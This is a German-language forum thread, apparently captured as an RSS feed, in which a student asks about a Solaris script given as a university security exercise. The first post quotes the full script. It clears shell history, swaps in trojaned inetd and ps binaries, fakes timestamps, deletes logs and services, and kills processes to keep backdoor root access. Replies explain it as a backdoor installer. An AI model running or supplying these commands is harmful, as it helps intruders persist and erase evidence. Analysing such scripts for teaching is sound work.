<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
  <channel>
    <title>was genau macht dieses Solaris-Script?</title>
    <link>http://forum.geizhals.at/feed.jsp?id=610658</link>
    <description>Geizhals-Forum</description>
    <item>
      <title>Re(2): was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5189698.html#5189698</link>
      <description>&lt;blockquote&gt;&lt;em&gt; TU Wien Security Übungsaufgabe?&lt;br&gt;&lt;/em&gt;&lt;/blockquote&gt;&lt;br&gt;&lt;br&gt;yep&lt;br&gt;&lt;blockquote&gt;&lt;em&gt; google mal&lt;br&gt;&lt;/em&gt;&lt;/blockquote&gt;&lt;br&gt;&lt;br&gt;tja, so ungefähr hab ich schon herausgefunden, was das tut, google sei Dank.&lt;br&gt;Aber bei manchen von den Dingen hab ich nicht herausgefunden, was genau passiert, wenn man es löscht.&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 21:43:46 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5189698.html#5189698</guid>
      <dc:creator>Infosauger</dc:creator>
      <dc:date>2008-12-11T21:43:46Z</dc:date>
    </item>
    <item>
      <title>Re: was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5189176.html#5189176</link>
      <description>TU Wien Security Übungsaufgabe? &lt;img src="teeth.gif" width="16" height="19" align="absmiddle" alt="|-D"/&gt;&lt;img src="hornteeth.gif" width="16" height="26" align="absmiddle" alt="&amp;gt;&amp;#58;-D"/&gt;&lt;br&gt;&lt;br&gt;Edit: google mal &lt;img src="zwinker.gif" width="16" height="19" align="absmiddle" alt=";-)"/&gt;&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 16:59:09 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5189176.html#5189176</guid>
      <dc:creator>DaSony</dc:creator>
      <dc:date>2008-12-11T16:59:09Z</dc:date>
    </item>
    <item>
      <title>Re: was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5189175.html#5189175</link>
      <description>TU Wien Security Übungsaufgabe? &lt;img src="teeth.gif" width="16" height="19" align="absmiddle" alt="|-D"/&gt;&lt;img src="hornteeth.gif" width="16" height="26" align="absmiddle" alt="&amp;gt;&amp;#58;-D"/&gt;&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 16:59:09 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5189175.html#5189175</guid>
      <dc:creator>DaSony</dc:creator>
      <dc:date>2008-12-11T16:59:09Z</dc:date>
    </item>
    <item>
      <title>Re(2): was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5189071.html#5189071</link>
      <description>hm, diese "Kiste" existiert glücklicherweise nicht wirklich. Ich soll das script nur analysieren.&lt;br&gt;&lt;br&gt;Danke auf jeden Fall, nach langem googeln bin ich auch zu dieser Lösung gekommen. Jetzt muss ich nur noch Zeile für Zeile genau schreiben, was es tut.&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 15:58:30 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5189071.html#5189071</guid>
      <dc:creator>Infosauger</dc:creator>
      <dc:date>2008-12-11T15:58:30Z</dc:date>
    </item>
    <item>
      <title>Re: was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5188959.html#5188959</link>
      <description>Da werden Binaries ersetzt, laufende Prozesse der ersetzen Binaries gekillt, und nicht zuletzt Spuren verwischt (keine Befehlshistory, gelöschte Logfiles, falsche Timestamps für die überschriebenen Dateien). Da will wohl jemand der irgendwie root geworden ist sicherstellen daß er auch in Zukunft root bleibt.&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 15:03:29 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5188959.html#5188959</guid>
      <dc:creator>juwb</dc:creator>
      <dc:date>2008-12-11T15:03:29Z</dc:date>
    </item>
    <item>
      <title>Re: was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5188914.html#5188914</link>
      <description>Ich bin auch kein Solaris-Spezialist, aber das sieht sehr nach "backdoor installieren" aus. Das Löschen div. files wird wohl nötig sein, weil der ersetzte inetd vermutlich sonst zu sichtbaren Fehlermeldungen/Konflikten führt.&lt;br&gt;&lt;br&gt;Nimm die Kiste lieber vom Netz, aber mach vorher noch ein "netstat" um zu sehen, welche IP-Adresse darauf zugreift. &lt;img src="zwinker.gif" width="16" height="19" align="absmiddle" alt=";-)"/&gt;&lt;br&gt;&lt;br&gt;&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 14:41:54 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5188914.html#5188914</guid>
      <dc:creator>mjy@geizhals.at</dc:creator>
      <dc:date>2008-12-11T14:41:54Z</dc:date>
    </item>
    <item>
      <title>was genau macht dieses Solaris-Script?</title>
      <link>http://forum.geizhals.at/t610658,5188678.html#5188678</link>
      <description>Folgendes Script ist gegeben, ich würde nun gerne wissen, was genau das macht:&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;div class=code&gt;&lt;pre&gt;&#xD;
1 unset HISTFILE; unset SAVEHIST&#xD;
2 cp temp /usr/sbin/inetd;&#xD;
3 chown root /usr/sbin/inetd; &#xD;
4 chgrp root /usr/sbin/inetd; &#xD;
5 touch 0716000097 /usr/sbin/inetd; &#xD;
6 rm -rf temp /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb* &#xD;
7 rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec* &#xD;
8 /usr/sbin/inetd -s; &#xD;
9 /usr/sbin/inetd -s; &#xD;
10 telnet localhost; &#xD;
11 /usr/sbin/inetd -s; &#xD;
12 ps -ef | grep inetd | grep bob |awk '{print "kill -9 " $2 }' &amp;gt; boo &#xD;
13 chmod 700 boo &#xD;
14 ./boo &#xD;
15 ps -ef | grep nfs | grep statd |awk '{print "kill -9 " $2 }' &amp;gt; boo &#xD;
16 chmod 700 boo &#xD;
17 ./boo &#xD;
18 ps -ef | grep ttdb | grep -v grep |awk '{print "kill -9 " $2 }' &amp;gt; boo &#xD;
19 chmod 700 boo &#xD;
20 ./boo &#xD;
21 rm -rf boo &#xD;
22 mkdir /usr/man/tmp &#xD;
23 mv update ps /usr/man/tmp &#xD;
24 cd /usr/man/tmp &#xD;
25 echo 1 \"./update -s -o output\" &amp;gt; /kernel/pssys &#xD;
26 chmod 755 ps update &#xD;
27 ./update -s -o output &amp;amp; &#xD;
28 cp ps /usr/ucb/ps &#xD;
29 mv ps /usr/bin/ps &#xD;
30 touch 0716000097 /usr/bin/ps /usr/ucb/ps &#xD;
31 cd / &#xD;
32 ps -ef | grep bob | grep -v grep &#xD;
33 ps -ef | grep stat | grep -v grep &#xD;
34 ps -ef | grep update&#xD;
&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;Ich weiss zwar grundsätzlich, was die Befehle wie cp mv etc. machen, aber was genau bewirkt nun z.B. das Löschen von /usr/lib/nfs/statd, /usr/openwin/bin/rpc.ttdb* und /var/adm/sec*?&lt;br&gt;Bin kein Unix bzw. Solaris-Spzialist, kenn mich mit dem ganzen zu wenig aus.&lt;br&gt;&lt;br&gt;Danke schon mal&lt;br&gt;&lt;br/&gt;</description>
      <pubDate>Thu, 11 Dec 2008 13:00:13 GMT</pubDate>
      <guid>http://forum.geizhals.at/t610658,5188678.html#5188678</guid>
      <dc:creator>Infosauger</dc:creator>
      <dc:date>2008-12-11T13:00:13Z</dc:date>
    </item>
  </channel>
</rss>
